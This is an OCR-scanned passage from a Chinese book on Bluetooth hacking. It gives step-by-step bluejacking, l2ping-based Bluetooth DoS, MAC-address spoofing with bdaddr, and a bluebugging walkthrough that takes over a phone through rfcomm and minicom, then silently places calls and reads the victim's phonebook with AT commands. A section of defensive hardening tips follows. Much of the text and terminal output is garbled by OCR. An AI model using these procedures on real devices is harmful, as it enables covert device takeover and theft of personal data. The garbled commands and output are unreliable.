将 此 类 联系 人 添加 至 通讯 录 。 一 般 情 况 
下 ， 设 为 不 可 发 现 模式 的 设备 不 容易 受到 
bluejacking 等 的 攻击 。 

如 下 图 所 示 为 在 PDA 上 对 开启 蓝牙 功 
能 的 Nokia 5300 进 行 bluejacking 攻 击 ， 通 过 
蓝牙 发 送 恶 意 名 片 的 工作 界面 。 如 这 里 写 
了 一 条 短信 ， 内 容 为 “Hi,I'm Christopher 
Yang! ! ”， 而 作为 攻击 目标 的 Nokia 
5300， 此 时 会 有 提示 收 到 一 条 未 知 的 短 
信 ， 询 问 是 否 查看 ， 当 使 用 者 选择 接收 ， 
就 能 够 收 到 该 短信 。 


+* dx 19:54 区 


Enterfile or message below: 
Hi, I'm Christopher Yang!! 


Devices: 


001a8926cbc8 NOKIA 5300 Object Push 
001a8926cbc8 NOKIA 5300 FTP 
001a8926cbc8 NOKIA 5300 
|001a8926cbc8 NOKIA 5300 


Info; 

|sendMse returned 0 
|Sending Message... 
[Connected... 
lsending 84 bytes 
[SendMsg returned 0 


[ee] 


16.4 蓝牙 DoSs 攻 击 技术 


DoS 攻 击 是 网 络 攻击 方式 的 一 种 ， 而 蓝 
牙 技术 是 无 线 网 络 的 一 种 ， 因 此 ， 蓝 牙 设 
备 也 会 受到 DoS 攻 击 ， 本 节 就 来 介绍 有 关 蓝 
牙 DoS 攻 击 技术 的 相关 知识 与 实战 。 


16.4.1 关于 蓝牙 Do9 攻 击 


DoS 攻 击 是 以 向 目标 主机 发 送 大 量 畸 形 
的 ICMP 数 据 包 的 方式 ， 使 得 目标 计算 机 忙 
于 响应 ， 从 而 达到 资源 耗 尽 死机 的 目的 ， 
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实现 这 种 攻击 技术 的 相关 工具 是 “Ping”， 
与 之 相 类 似 ， 实 现 蓝牙 DoS 攻 击 的 工具 是 
“L2ping”。 

L2ping 是 一 款 用 于 测试 蓝牙 链 路 连通 
性 的 工具 ， 主 要 在 Linux 操 作 系 统 下 使 用 。 
不 过 这 款 工具 并 不 需要 先 使 用 PIN 码 建立 连 
接 ， 而 是 对 蓝牙 适配器 探测 范围 内 的 蓝牙 
设备 都 可 以 进行 连通 性 测试 。 


16.4.2 ”蓝牙 DoS 攻 击 演示 


在 了 解 有 关 蓝 牙 DoS 攻 击 的 相关 基础 知 
识 后 ， 下 面 就 以 在 BackTrack4 Linux 环 境 下 
演示 DoS 攻 击 为 例 ， 讲 解 实现 DoS 攻 击 的 相 
关 操 作 步 又 。 

载 入 蓝牙 适配器 。 在 开始 实战 前 需要 
先 载 入 笔记 本 电脑 内 置 的 或 者 外 置 蓝牙 适 
配器 ， 具 体 命令 如 下 : 


hciconfig 
hciconfig hci0 up 


【参数 解释 】 

e hci0: 此 为 蓝牙 适配器 名 称 ， 一 般 都 
为 hci0， 若 同时 使 用 多 个 蓝牙 适 配 
器 ， 则 第 二 个 就 是 hcil， 以 此 类 推 。 

e up: 和 ifconfig 类 似 ，up 就 是 载 入 该 
设备 ， 若 是 不 再 使 用 适配器 ， 此 处 
应 当 使 用 down 来 卸载 该 设备 。 

一 般 都 会 先 输入 hciconfig 来 查看 是 否 有 
蓝牙 设备 插入 ， 若 hci0 存 在 ， 再 执行 hcicon- 
fig up 来 激活 ， 若 没有 任何 回应 ， 则 应 该 重 
新 插入 蓝牙 适配器 ， 具 体 如 下 图 所 示 。 


‘08: 80:09:80:09:90 ACL NTU: 90:9 SCO MTU: et8 


clL: sco:8 events:6 errors:0 
ands -0 errors:0 


step 贺 扫描 蓝牙 设备 ， 具 体 命令 如 下 : 


hcitool scan 
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由 于 之 前 小 节 已 经 详细 介绍 过 该 命令 ， 
这 里 不 再 解释 。 执 行 效果 如 下 图 所 示 ， 可 
以 看 到 扫描 出 一 个 开启 蓝牙 的 设备 ，MAC 
地 址 为 “00:12:D2:91:34:C8”， 设 备 名 称 为 


可 Se | 可 shelhoz | 


[Step 国 对 蓝牙 设备 进行 DoS 攻 击 。 目 标 确 认 
后 ， 就 可 以 直接 开始 连通 性 测试 ，12ping 的 
基本 命令 很 简单 ， 具 体 命令 如 下 : 

12ping 目标 MAC 


【参数 解释 】 

目标 MAC: 此 处 输入 之 前 扫描 得 到 的 
目标 蓝牙 设备 的 MAC 地 址 。 

按 Enter 键 后 ， 将 看 到 类 似 于 如 下 所 
示 的 内 容 。 


Zerone ~ # l2ping 00:12:D2:91:34:C8 

Pn 
00:15:83:F0:F0:5F (data size 44) ... 

96 bytes from 00:12:D2:91:34:C8 id 0 
time 816.88ms 

96 bytes from 00:12:D2:91:34:C8 id 1 
time 77.67ms 

96 bytes from 00:12:D2:91:34:C8 id 2 
time 69.61lms 

96 bytes from 00:12:D2:91:34:C8 id 3 
time 69.55ms 

96 bytes from 00:12:D2:91:34:C8 id 4 
time 71.49ms 

96 bytes from 00:12:D2:91:34:C8 id 5 
time 78.44ms 

96 bytes from 00:12:D2:91:34:C8 id 6 
time 76.38ms 

96 bytes from 00:12:D2:91:34:C8 id 7 
time 79.31ms 

8 sent, 8 received, 


在 默认 情况 下 ，Linux 操 作 系 统 下 和 Win- 
dows 操 作 系统 下 的 ping 命 令 不 同 ， 使 用 上 述 命 
令 会 持续 发 包 ， 直 到 按 Ctrl+C 组 合 键 来 终止 ， 
默认 发 包 的 大 小 为 44 个 字 节 ， 如 下 图 所 示 。 
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与 在 传统 有 线 网 络 中 使 用 ping 命 令 一 
样 ， 由 于 发 送 数 据 量 很 少 ， 所 以 上 面 的 操 
作 及 命令 只 能 算是 蓝牙 连通 性 测试 ， 而 不 
能 算是 蓝牙 DoS 攻 击 。 那 么 ， 想 要 对 目标 蓝 
牙 设备 造成 Dos 攻 击 ， 则 应 该 增 大 蓝牙 数据 
流 ， 具 体 命令 如 下 : 

12ping -s num 目标 MAC 

【参数 解释 】 

e -snum: 这 里 是 定制 发 送 数 据 包 的 大 

小 ， 而 num 处 则 是 输入 具体 的 数值 。 

e 目标 MAC: 此 处 输入 之 前 扫描 得 到 

的 目标 蓝牙 设备 的 MAC 地 址 。 

这 里 注意 一 下 ， 返 回 的 数据 报 文 的 
延 时 。 如 下 图 所 示 ， 当 设置 数据 包 大 小 为 
2000 时 ， 延 时 达到 了 160ms 左 右 ， 而 之 前 
在 默认 情况 应 为 40ms 左 右 ， 可 见 随 着 单 包 
容量 的 增 大 ， 目 标 设备 的 响应 也 开始 变 得 
缓慢 。 


作为 对 比 ， 如 下 图 所 示 ， 当 数据 包 变 
为 5000 时 ， 延 时 增长 到 2000ms 左 右 ， 可 见 
由 于 数据 包 的 增 大 ， 确 实 使 得 目标 耗费 了 
大 量 的 资源 进行 处 理 ， 也 就 造成 了 响应 的 
缓慢 。 


类 似 地 ， 当 数据 包 变 为 40 000 时 ， 延 时 
也 增长 到 7500ms 左 右 ， 目 标的 蓝牙 模块 或 
适配器 耗费 了 大 量 的 运算 性 能 进行 处 理 ， 
从 而 响应 也 变 得 愈 发 缓慢 。 


[step 图 检查 攻击 效果 。 由 下 图 可 以 看 到 ， 在 
攻击 前 ， 使 用 hcitool 还 能 探测 到 开局 蓝牙 的 
PDA 设 备 ， 而 在 遭 到 攻击 后 ， 则 无 法 探测 
到 ， 或 者 出 现 “ 时 而 能 够 探测 到 ， 时 而 不 
能 ”的 情况 。 


hristopher Yani 


| shell 上 shell No. 2 


要 注意 的 是 ， 包 的 大 小 也 不 能 设置 
得 太 大 ， 对 于 不 同 的 蓝牙 适配器 ， 能 够 承 
受 的 程度 也 不 一 样 ， 比 如 当 设 置 数据 包 为 
10 000 的 时 候 ， 直 接 就 提示 连接 被 中 断 了 。 
而 比较 上 图 所 示 ， 那 款 Broadcom 芯 片 的 蓝 
牙 适 配器 是 可 以 达到 40 000 数 据 包 的 。 


Eq Asw Boopustkz zcfnuaz Helb 


16.5 ”安全 防护 及 改进 


在 了 解 有 关 黑 客 蓝牙 攻击 的 相关 技术 
后 ， 本 节 给 出 比较 有 效 的 几 种 改进 现 有 蓝 
牙 设备 安全 性 的 方法 ， 供 大 家 参考 。 

1. 关闭 蓝牙 功能 

关闭 蓝牙 功能 是 提交 设备 安全 性 最 
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有 效 的 方法 。 看 到 这 一 项 估计 有 很 多 读者 
会 颇 不 以 为 然 ， 但 是 事实 证 明 ， 有 很 多 用 
户 在 购买 全 新 手机 后 ， 由 于 对 很 多 手机 默 
认 设 置 蓝牙 开启 的 不 了 解 ， 所 以 导致 自己 
手机 蓝牙 功能 长 期 处 于 开启 状态 却 毫 不 知 
情 ， 增 加 了 自身 隐私 泄露 的 社会 。 如 下 图 
所 示 为 设置 手机 的 蓝牙 为 关闭 状态 。 


测 蓝牙 


圆 移动 网 络 


2. 设置 蓝牙 设备 不 可 见 


其 实 有 一 个 很 简单 的 办 法 就 是 将 蓝牙 
功能 设置 为 不 可 见 ， 所 谓 不 可 见 就 是 不 能 
够 被 其 他 蓝牙 设备 直接 搜索 到 ， 只 有 之 前 
连接 过 的 蓝牙 设备 才 可 以 直接 连接 此 设备 。 
在 手机 中 单 击 “ 蓝 牙 设 置 ”选项 ， 取 消 “ 可 
检测 ”的 选中 状态 ， 这 样 就 会 使 手机 上 的 蓝 
牙 设备 处 于 不 可 见 的 状态 ， 也 就 是 说 别人 扫 
描 时 是 扫描 不 到 我 的 蓝牙 设备 的 ， 即 可 实现 
蓝牙 功能 不 可 见 的 目的 。 


蓝牙 


设备 名 称 


可 检测 


3. 限制 蓝牙 可 见 时 长 

直接 关闭 可 见 模式 可 能 对 于 一 些 用 户 
而 言 ， 反 而 会 造成 一 些 麻 烦 。 那 么 ， 也 可 
以 通过 限制 可 见 模式 的 时 长 ， 来 达到 加 强 
安全 性 的 目的 。 对 于 使 用 Windows Mobile 系 
统 的 智能 手机 而 言 ， 进 入 到 蓝牙 配置 界面 
下 ， 可 以 将 蓝牙 的 可 见 时 间 设 置 为 “5 分 钟 
后 ”， 即 5 分 钟 后 该 智能 手机 的 蓝牙 功能 将 
自动 转 为 “不 可 见 ”模式 。 这 样 ， 就 有 效 
地 防止 了 可 能 的 蓝牙 扫描 及 攻击 隐患 。 
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4. 升级 操作 系统 至 最 新 版 本 


及 时 将 智能 手机 的 操作 系统 或 者 固件 
升级 到 最 新 的 版 本 也 是 提高 蓝牙 设备 安全 
性 的 方法 。 尤 其 是 那些 既 需 要 蓝牙 功能 ， 
又 需要 不 时 使 用 蓝牙 与 朋友 分 享 桌面 、 音 
乐 、 铃 声 及 图 片 或 者 传送 文件 的 朋友 ， 避 
免 蓝 牙 安全 漏洞 隐患 最 好 的 办 法 就 是 升级 
手机 的 操作 系统 ， 比 如 将 智能 手机 默认 的 
Windows Mobile 5.0/6.1 版 系统 升级 为 较 新 
的 6.5 版 本 系统 。 


5. 设置 高 复杂 度 的 PIN 码 


通常 情况 下 ， 蓝 牙 耳 机 等 便携 式 外 设 
默认 PIN 码 长 度 均 为 4 位 数 ， 且 一 般 为 纯 数 
字 的 简单 组 合 ， 如 1234、0000、1111 等 。 即 
使 个 别 产品 支持 额外 配置 PIN 码 ， 但 很 多 人 
为 了 方便 起 见 ， 仍 然 会 使 用 3 一 4 位 纯 数 字 
这 样 简单 的 密码 。 

同样 地 ， 在 具备 蓝牙 功能 的 智能 手机 
与 笔记 本 电脑 之 间 通 过 蓝牙 连接 时 ， 一 样 
需要 配置 PIN 码 ， 若 想 提 高 其 安全 性 ， 可 以 
将 PIN 码 设置 为 比较 长 的 数值 ， 如 6 位 ， 也 
就 是 说 ， 尽 可 能 地 使 用 高 复杂 度 的 PIN 码 。 


6. 拒绝 陌生 蓝牙 连接 请 求 


对 于 手机 或 者 PDA 上 突然 出 现 的 蓝牙 
连接 提示 ， 应 明确 其 来 源 。 若 无 法 确定 来 
源 ， 应 拒绝 接受 蓝牙 连接 请 求 ， 这 样 可 最 
大 可 能 地 避免 蓝牙 攻击 及 病毒 的 侵扰 。 


7. 拒绝 可 疑 蓝牙 匿名 信件 
同样 地 ， 当 自己 的 手机 上 显示 为 一 个 
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蓝牙 信息 收取 ， 而 来 源 是 并 不 熟悉 的 其 他 
设备 ， 应 拒绝 接收 ， 这 样 同样 对 避免 蓝牙 
攻击 及 病毒 的 侵扰 有 所 帮助 。 


8. 启用 蓝牙 连接 验证 


对 于 智能 手机 或 者 使 用 外 置 蓝牙 适 
配器 的 笔记 本 电脑 而 言 ， 开 启 强制 安全 验 
证 将 有 效 地 确保 通过 蓝牙 信道 传输 的 安 
全 性 。 在 开启 验证 后 ， 所 有 的 蓝牙 连接 操 
作 都 将 经 过 对 方 的 同意 ， 比 如 通过 蓝牙 发 
送 文件 ， 则 接收 方 的 设备 上 会 出 现 连 接 提 
示 ， 只 有 接收 方 选择 同意 后 ， 文 件 才能 够 
通过 蓝牙 发 出 。 

如 下 图 所 示 ， 应 确保 在 蓝牙 配置 中 无 
线 发 送 验证 界面 的 “需要 验证 ” 复 选 框 是 
处 于 勾 选 状态 的 。 


16.6 ”实战 演练 


实战 演练 1 一 一 蓝牙 bluebugging 攻 击 技术 


在 “蓝牙 基本 Hacking 技 术 ” 这 一 节 
中 ， 已 经 简单 介绍 了 有 关 蓝 牙 bluebugging 
攻击 技术 的 相关 知识 ， 下 面 来 介绍 一 个 有 
关 蓝 牙 bluebugging 攻 击 的 相关 实例 。 

在 实施 攻击 之 前 ， 需 要 准备 一 些 攻击 
工具 ， 大 多 数 的 蓝牙 攻击 在 Linux 操 作 系统 
下 默认 已 安装 ， 如 hciconfig、hcitool 等 ， 
不 过 还 需要 安装 minicom 终 端 工具 。 对 于 
BackTrack4 Linux 的 用 户 来 说 ，minicom 已 
经 内 置 安装 完毕 ， 无 须 再 下 载 。 

这 里 以 国内 广泛 流行 的 山寨 手机 为 例 来 
演示 bluebugging 攻 击 ， 具 体 的 攻击 步 又 如 下 。 


第 1 步 : 扫描 蓝牙 设备 


[Sep 国 在 载 入 蓝牙 适配器 后 ， 就 可 以 对 周边 
开启 蓝牙 的 移动 设备 进行 扫描 ， 具 体 命令 
如 下 : 


hcitool scan 


[step 图 按 Enter 键 后 ， 可 以 看 到 发 现 一 个 名 为 
“MTKBTDEVICE” 的 设备 ， 该 设备 即 为 测 
试用 的 山寨 手机 ， 这 个 名 称 是 其 内 置 的 蓝牙 
芯片 名 称 ， 其 中 ，MTK 表 示 出 其 芯片 厂商 ， 

而 BT 即 BlueTooth 的 缩写 ，DEVICE 就 是 设备 
的 缩写 。 

一 般 在 搜索 到 开启 蓝牙 功能 的 设备 
后 ， 会 使 用 12ping 来 测试 一 下 与 该 设备 的 蓝 
牙 模块 之 间 是 否 数据 可 达 。 具 体 命令 如 下 : 

12ping 目标 蓝牙 设备 MAC 


按 Enter 键 后 即 可 看 到 如 下 图 所 示 内 
会 显示 出 类 似 “6 sent,6 received, 0% 
loss ”的 提示 ， 即 “发 送 6 个 包 ， 收 到 6 个 
没有 丢失 ”的 意思 。 


longas@ZerOne; ~ 


$ he 


ng 
60:23: 
on 2 pin 9 69:68:21:86 

png B90" D1 6 e620 pron 990.13: 13:05:39.39 (data size 44) 
rom 69:68:21:86:66:01 id 0 time 34.86ms 


meroevce os 


44 bytes from 69:68:21:86:66:01 id 2 tine 26.10ms 


44 bytes from 69:68:21:86:66:01 id 3 time 26.57ns 


44 bytes from 69:68:21:86:66:01 id 4 time 30.49ms 
4 bytes fro 69: 09521:96:65:01 14 5 tine 29.1n5 


[ce Sent, 6 received, O% Los 
|Longasezergne， | 


第 2 步 : 查找 串 行 端口 服务 


[SeeEg 为 了 获取 手机 的 控制 权 ， 需 要 连接 目 
标 设备 的 串 行 端口 ， 所 以 需要 通过 蓝牙 来 
搜索 关于 串 行 端口 的 服务 。 这 里 需要 使 用 
到 sdptool 工 具 ， 具 体 命令 如 下 : 
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sdptool browse 目标 设备 的 MAC 


【参数 解释 】 

@ browse: 浏览 所 有 可 用 服务 ， 主 要 
是 列 出 所 有 隐藏 的 服务 内 容 、 工 作 
频道 等 。 

[step 图 按 Enter 键 后 ， 可 以 看 到 出 现 了 详细 的 
服务 列表 ， 这 些 都 是 该 手机 设备 支持 的 服务 
内 容 。 


对 于 攻击 者 而 言 ， 需 要 找到 串 行 端口 
ee 了 Port 的 信息 ， 在 sdptool 命 令 返回 的 
内 容 中 查看 ， 即 可 看 到 名 为 Serial Port 的 内 
容 ， 其 中 ， 主 要 需 留 意 的 是 Channel (频道 ) 
的 数值 。 如 下 图 黑 框 处 所 示 ， 这 里 的 Channel 
就 是 10， 即 串口 使 用 的 隐藏 频道 是 10。 


第 3 步 : 配置 蓝牙 连接 设置 


step 回 对 Ubuntu 操作 系统 下 的 蓝牙 配置 文件 
进行 修改 和 设置 ， 具 体 命令 如 下 : 

nano /etc/Bluetooth/rfcomm.conf 
【参数 解释 】 

e nano: Linux 操 作 系统 下 一 款 工作 在 


Shell 下 的 编辑 工具 。 

e Ifcomm.conf 蓝 牙 连 接 配置 文件 。 
[step 图 按 Enter 键 后 即 可 看 到 如 下 图 所 示 内 
容 ， 其 中 ， 在 device 后 面 填 入 需要 连接 的 目 
标 蓝 牙 设备 MAC 地 址 ， 这 里 就 是 上 面 使 用 
hcitool 搜 索 到 的 蓝牙 设备 MAC 地 址 。 然 后 
在 channle 后 面 填 入 Serial Port 的 频道 数值 ， 
这 里 就 是 上 面 使 用 sdptool 列 出 的 内 容 ， 即 
10 频 道 。 

[ep 图 配置 完毕 ， 使 用 Ctrl+X 组 合 键 退出 ， 注 
意 选 择 Y 保 存 。 然 后 开始 配置 设备 的 映射 。 


rfcomm bind /dev/rfcomm0 


【参数 解释 】 
e bind: 绑 定 在 某 一 个 设备 上 ， 这 里 
指 与 目标 蓝牙 设备 之 间 建 立 一 个 映 
射 关 系 ， 也 就 是 rfcomm0 指 代目 标 
设备 。 
[sep 贺 按 Enter 键 后 就 可 以 开始 配置 终端 工具 


minicom 。 


longas@ZerOne; ~ 


RFCOMM configuration file. 


rfcome { 
bind na 
devlce 69:68:21:86:66:01; 
channel 1 


coment “Exampte Blueroorh device"; 


第 4 步 : 配置 minicom 


[step 图 在 使 用 minicom 连 接 之 前 ， 需 要 先 对 
串口 进行 设置 ， 具 体 命令 如 下 : 

【参数 解释 】 

e -s: 进入 setup 模 式 ， 即 配置 模式 。 
[step 图 按 Enter 键 后 ， 即 可 看 到 如 图 所 示 的 配 
置 菜单 ， 使 用 上 下 键 在 菜单 中 选择 “Serial 
port setup ”项 并 按 Enter 键 ， 该 选项 主要 设 
置 串 口 。 
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longas@ZerOne: 一 


Lconfiguration] 
1 Filenanes and paths 
protocols 


[step 图 在 打开 的 设置 框 中 ， 确 保 “Serial 
Device” 项 中 设置 为 /dev/rfcomm0， 与 前 面 
绑 定 的 一 样 ， 具 体 如 下 图 所 示 。 然 后 在 配 
置 菜单 中 选 “Save setup as df1” 保 存 (一 
定 要 记得 这 一 步 ) ， 提 示 成 功 后 再 选 “Exit 
from Minicom” 退 出 菜单 。 


longas@ZerOne: ~ 


/dev/ricome 


st 
Lockfile Location /var/lock 


115200 BN 
Hardware Flow Control ; Yes 
Softvare Flow Control ; No 


change wnich scrting7 目 


| Screen and keyboard 


第 5 步 : 实施 bluebugging 攻 击 


[G6 一 切 配置 无 误 后 ， 就 可 以 开始 进行 
bluebugging 攻 击 ， 先 确定 目标 手机 设备 在 
蓝牙 适配器 的 工作 范围 内 ， 然 后 输入 命令 
如 下 : 


minicom -m 


[sep 图 按 Enter 键 后 即 可 看 到 如 下 图 所 示 内 
容 ， 成 功 连接 至 该 手机 设备 。 此 时 ， 受 
害 者 手机 上 会 出 现 一 个 提示 “串口 已 连 
接 ”， 不 过 该 提示 会 一 闪 而 过 ， 不 需要 对 
方 的 确定 。 这 时 候 ， 攻 击 者 就 已 经 成 功 地 
获取 了 该 手机 的 控制 权 。 


Nielcone 


rions: Ton 
onpiled on Sep 35 2909, 23+49:29 
one oer 


5 ESC,Z for hetp on special keys 


NT 57=45 58-6 LI V1 X4 &c1 El 09 
or 


at 
ox 


[step 图 现在 ， 攻 击 者 已 经 可 以 对 该 手机 进 
行 任意 操作 ， 包 括 命令 该 手机 向 外 拨打 电 
话 、 读 取 手 机 短信 、 编 写 短信 向 外 发 送 、 
读 取 通 话 记录 等 。 拨 打 电 话 ， 输 入 参数 
如 下 : 

Atdt 手机 号 码 


【参数 解释 】 
e Atdt 手 机 号 码 : 该 参数 用 于 拨打 电 
话 ， 后 面 “ 手 机 号 码 ” 为 具体 的 电 
话 号 码 ， 需 要 注意 的 是 ， 由 于 机 型 
的 不 同 ， 有 时 在 拨打 手机 时 需要 加 
入 086 这 样 国际 区 号 。 
[step 贺 按 Enter 键 后 ， 受 害 人 的 手机 会 自动 拨 
打 该 号 码 ， 如 下 图 所 示 。 


etcone to minicon 2.3 


lopTIONS: lsn 
[conpiled on Sep 25 2969，23:49:29 
Port /dev/rfconne 


Press ESC,Z for help on special keys 


IAT 57=45 50=0 LI V1 X4 Scl El 00 
ox 
ot 


ox 
tdt 135 7 690 
jd CARRIER 

ox 


对 于 攻击 者 而 言 ， 当 然 不 会 简单 地 拨 
号 那么 简单 ， 输 入 参数 如 下 : 

at+cpbr=1,100 

【参数 解释 】 

® attcpbr=<indexl> [,<index2>]: 该 参 
数 用 于 查询 手机 中 电话 憩 的 内 容 。 
其 中 ， 在 index1 处 输入 序号 ， 即 可 
查询 该 顺序 号 码 下 的 电话 号 码 。 若 
需要 查询 某 一 段 号 码 ， 则 在 index1 
处 输入 起 始 位 ， 在 index2 处 输入 结 
束 位 即 可 。 

在 这 里 的 命令 意 为 列举 出 手机 电话 号 
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码 敌 中 前 100 位 的 内 容 。 按 Enter 键 后 就 可 看 
到 如 下 图 所 示 的 内 容 ， 将 会 自动 将 读 取 的 
前 100 位 号 码 全 部 列举 出 来 。 此 时 ， 受 害 者 
的 手机 是 没有 任何 提示 和 反应 的 。 


Fem: 1, ‘Bm, 13, 
(om: 1, ‘mm, 2," 


om: .m1 


如 下 图 所 示 可 以 看 到 ， 由 于 该 手机 中 
只 存 了 70 个 号 码 ， 所 以 经 过 数秒 后 ， 就 成 
功 地 将 全 部 号 码 读 取 完毕 。 


lorgas@Zer0ne' ~ 


实战 演练 2 一 一 蓝牙 DoS 测 试问 题 

为 了 解决 初次 学 习 蓝 牙 攻 击 可 能 遇 到 
的 几 种 情况 ， 下 面 给 出 常见 的 几 种 情况 及 
相应 的 解释 。 

1. 目标 蓝牙 芯片 不 支持 


当 发 送 的 蓝牙 通信 数据 包 大 小 过 于 庞 
大 ， 超 过 目标 设备 蓝牙 芯片 默认 所 能 接受 
的 时 ， 会 失去 响应 或 者 直接 拒绝 响应 。 
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| mshel wm shell No 2 


2. 程序 出 错 
若 长 时 间 用 于 进行 大 数据 流 的 蓝牙 DoS 
攻击 ，L2ping 也 会 出 现 一 些 莫名 的 错误 ， 比 
如 下 图 所 示 的 ， 会 显示 当前 程序 已 经 在 执 
行 中 ， 这 往往 是 程序 在 缓存 上 出 了 问题 。 


3. 远程 蓝牙 设备 关闭 ， 或 者 当 机 重 启 


当 突 然 无 法 探测 到 蓝牙 设备 时 ， 比 如 
对 方 关闭 蓝牙 功能 、 关 机 或 重启 等 ， 会 出 
现 如 下 图 所 示 的 提示 “Host is down”， 即 
目标 已 关闭 。 


小 试 身手 
让 练习 1: 修改 蓝牙 设备 地 址 
为 了 躲避 可 能 的 搜索 和 跟踪 ， 用 户 
可 以 修改 蓝牙 设备 的 地 址 来 迷惑 黑客 ， 从 
而 提高 蓝牙 设备 的 安全 系数 。 对 于 黑客 而 
四 言 ， 可 以 将 蓝牙 适配器 的 MAC 地 址 修改 成 
其 他 的 或 者 指定 的 地 址 ， 以 达到 迷惑 欺骗 
对 方 的 攻击 目的 。 

修改 蓝牙 设备 地 址 比较 常用 的 工具 是 
bdaddr， 该 工具 在 BackTrack4 Linux 下 已 经 
内 置 。 这 里 就 来 介绍 如 何 使 用 bdaddr， 具 体 
的 操作 步骤 如 下 。 
[Seeg 查看 当前 蓝牙 设备 的 地 址 ， 输 入 
hciconfig， 按 Enter 键 后 出 现 如 下 图 所 示 的 


16.7 
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内 容 ， 在 其 中 可 以 查看 当前 设备 的 MAC 
地 址 。 


[step 图 作为 测试 ， 这 里 就 修改 成 “00:11:22: 
33:44:55”， 具 体 命令 如 下 : 

bdadqdr [-i hci0] [00: 11: 22: 33: 44: 55] 

按 Enter 键 后 ， 就 可 以 看 到 如 下 图 所 示 

的 内 容 。 其 中 在 MAC 地 址 下 方 显示 的 是 

“Address changed- Reset device now”， 即 

地 址 成 功 修改 ， 重 新 启动 蓝牙 适配器 。 接 下 

来 只 要 使 用 命令 hciconfig hci0 reset 就 可 以 。 


hell No. 2 “KBnsole 加 , 硬 加 


侈 提示 :修改 蔓 牙 设备 MAC 地 址 命令 的 具 
体格 式 如 下 : 


bdaddr 


【参数 解释 】 

e@ -i <dev>: 后 跟 蓝 牙 设 备 ， 就 是 前 面 
载 入 的 设备 ， 一 般 都 是 以 hci0、hcil 
等 名 称 设置 ， 这 里 是 hci0。 

e bd addr: 此 为 希望 修改 成 的 蓝牙 
MAC 地 址 。 


[-i <dev>] [new bd-addr] 


练习 2: 使 用 耳机 建立 通信 


蓝牙 之 间 配 对 完成 后 ， 就 可 以 使 用 耳机 
建立 通信 了 ， 具 体 的 操作 步 又 如 下 。 
[step 国 已 经 成 功 配 对 ， 此 时 就 可 以 在 
BlueSoleil 的 主 界 面 上 方 单 击 左 上 角 的 “ 蓝 
牙 个 人 局 域 网 ”图 标 。 直 接 双击 可 以 建立 
连接 ， 或 者 右键 单 击 建立 连接 、 查 看 状态 
及 属性 等 。 


ITTETI 


连接 
状 高 (U) 


展 性 (BR) 


[step 图 一 旦 连接 成 功 ， 就 会 看 到 在 BlueSoleil 
主 界面 中 心 和 蓝牙 耳机 图 标 出 现 了 一 条 不 
断 闪 动 的 双向 链 路 。 此 时 ， 蓝 牙 设备 图 标 及 
Windows 操 作 系 统 任务 栏 右 下 角 蓝 牙 图 标的 
颜色 会 从 原来 的 蓝 色 变 成 绿色 。 


[Eee 图 现在 ， 在 Ubuntu 操作 系统 下 随意 选中 
一 个 文件 ， 选 择 “ 发 送 到 ”菜单 命令 ， 就 
能 够 看 到 如 下 图 所 示 的 内 容 ， 在 “发 送 作 
为 ” 栏 中 选择 “蓝牙 (OBEX Push) ”， 然 
后 在 “发 送 到 ” 栏 中 选择 目标 为 已 经 建立 
关联 的 名 为 “mckh3e8b4flbc6” 的 主机 设 
备 ， 单 击 “发送 ” 按 钮 。 


| 
压缩 


发 送 包 在 (): 


DC 5) | 
[step 图 此 时 ， 在 Windows 2003 操 作 系 统 下 的 
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BlueSoleil 上 就 能 够 看 到 如 下 图 所 示 的 弹出 
窗口 ， 提 示 当 前 名 为 “ZerOne-0” 的 设备 正 
试图 建立 蓝牙 信息 交互 ， 单 击 “ 是 ”按钮 
接受 这 一 请 求 。 

EE 
Te 息 交 的 服务 。 点 击 ” [CE 
2 


厂 总 是 允许 该 远程 设备 访问 该 服务 (人) 
剩余 时 间 : 。 26 秒 


[step 图 当 Windows 用 户 接受 请 求 后 ， 在 
Ubuntu 操作 系统 下 就 会 出 现 如 下 图 所 示 的 文 
件 传输 窗口 ， 可 以 看 到 传输 速度 为 77KB/s， 
这 个 速度 和 蓝牙 设备 间距 离 、 蓝 牙 协 议 版 
本 等 都 有 关系 。 


通过 蓝牙 传输 文件 


从 : /home/longas/ 图 片 
到 : 09:05:23:AF:20:5E 


EN 
发 送 Screen.png 
LRC | 


这 样 ， 就 成 功 地 建立 了 不 同类 型 操作 
系统 间 的 蓝牙 连接 ， 并 能 够 通过 该 连接 分 
享 和 传输 诸如 图 片 、mp3、 文 档 等 各 类 文 
件 ， 这 样 的 蓝牙 局 域 网 传输 技术 优点 很 明 
显 ， 不 但 可 以 不 需要 路 由 器 的 支持 ， 还 可 
以 在 最 节省 电量 的 情况 下 实现 文件 共享 ， 
同时 在 距离 上 还 能 够 保证 10m 甚 至 更 远 范围 
内 的 有 效 传输 。 
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无 线 网 络 是 利用 电磁 波 作为 数据 传输 的 媒介 ， 就 应 用 层面 而 言 ， 与 有 线 网 络 的 用 途 完 


全 相似 ， 最 大 的 不 同 是 传输 信息 的 媒介 不 同 。 


本 章 介绍 无 线 网 络 安全 的 防护 策略 ， 主 要 内 


容 包括 组 建 无 线 局 域 网 、 共 享 无 线 上 网 、 无 线 网 络 的 安全 防护 策略 和 无 线路 由 器 的 管理 工 


具 等。 


17.1 组 建 无 线 网 络 


无 线 局 域 网 络 的 搭建 给 家 庭 无 线 办 公 
带 来 了 很 多 方便 ， 而 且 可 随意 改变 家 庭 里 
的 办 公 位 置 而 不 受 束缚 ， 大 大 适应 了 现代 
人 的 追求 。 


17.1.1 搭建 无 线 局 域 网 环境 


建立 无 线 局 域 网 的 操作 比较 简单 ， 在 有 
线 网 络 到 户 后 ， 用 户 只 需 连接 一 个 具有 无 线 
WiFi 功 能 的 路 由 器 ， 然 后 各 房间 里 的 电脑 、 
笔记 本 电脑 、 手 机 和 iPad 等 设备 都 可 利用 无 
线 网 卡 与 路 由 器 之 间 建 立 无 线 链接 ， 即 可 构 
建 整 个 办 公 室 的 内 部 无 线 局 域 网 ， 如 下 图 所 
示 为 一 个 无 线 局 域 网 连接 示意 图 。 


rm 


(fr net ) 
ADSL/CABEL 


pe 


好 


安装 无 线 网 卡 
的 电脑 3 


安装 无 线 网 卡 
的 电脑 


建立 无 线 局 域 网 的 第 一 步 就 是 配置 无 
线路 由 器 ， 默 认 情 况 下 ， 具 有 无 线 功能 的 


路 由 器 是 不 开启 无 线 功能 的 ， 需 要 用 户 手 
动 配置 。 在 开启 路 由 器 的 无 线 功能 后 ， 就 
可 以 配置 无 线 网 了 。 

使 用 电脑 配置 无 线 网 的 操作 步骤 如 下 。 
